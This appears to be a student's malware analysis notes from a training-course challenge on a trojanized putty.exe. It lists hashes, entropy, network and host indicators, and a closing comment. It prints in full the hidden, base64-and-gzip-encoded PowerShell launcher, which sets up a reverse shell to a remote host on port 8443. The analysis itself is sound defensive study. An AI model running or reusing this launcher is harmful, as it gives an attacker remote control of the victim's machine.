Malware Analysis Notes: Putty.exe
I finally was able to get back around to working on the PMAT course by, HuskyHacks and TCM Security . These are my notes from the SillyPutty challenge where we were asked to perform analysis on the putty.exe. I haven't looked into the walkthrough on this challenge yet, but I am confident that I am on the right track.
File Hashes:
Sha256: 0C82E654C09C8FD9FDF4899718EFA37670974C9EEC5A8FC18A167F93CEA6EE83\
Sha1: C6A97B63FBD970984B95AE79A2B2AEF5749EE463
Md5: 334A10500FEB0F3444BF2E86AB2E76DA
?
Entropy: 7.394 (Possibly packed?) ---- gzip compressed script within
Virus Total:
Trojan?
Submitted to VT on 2021-10-26 05:10:10 UTC
Analysis Post Detonation:
?Network Indicators:
PowerShell script is trying to reach out to: bonus2.corporatebonusapplication.local on port 8443
Windows backdoor making a call to a DNS server over HTTPS port 8443.
Was able to establish a connection via netcat, but it was unstable and closed after trying to inject commands.
Host Based Indicators:
PowerShell is run as a child process to putty.exe. It is running the command which is base64 encoded and gzip compressed:?
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
The script looks like it sets up a reverse shell?on port 8443 (alternative https), it then prepares the network stream for communication, performing encryption and authentication if need be. It can then execute code or download a second stage from the remote server.
Script De-obfuscated:
Cybersecurity and Information Assurance Analyst
1 年I am not allowed to edit this, but I believe that the reverse shell was unstable because there was no TLS certificate exchange between clients/servers. I also misspoke and called the Powershell script a command.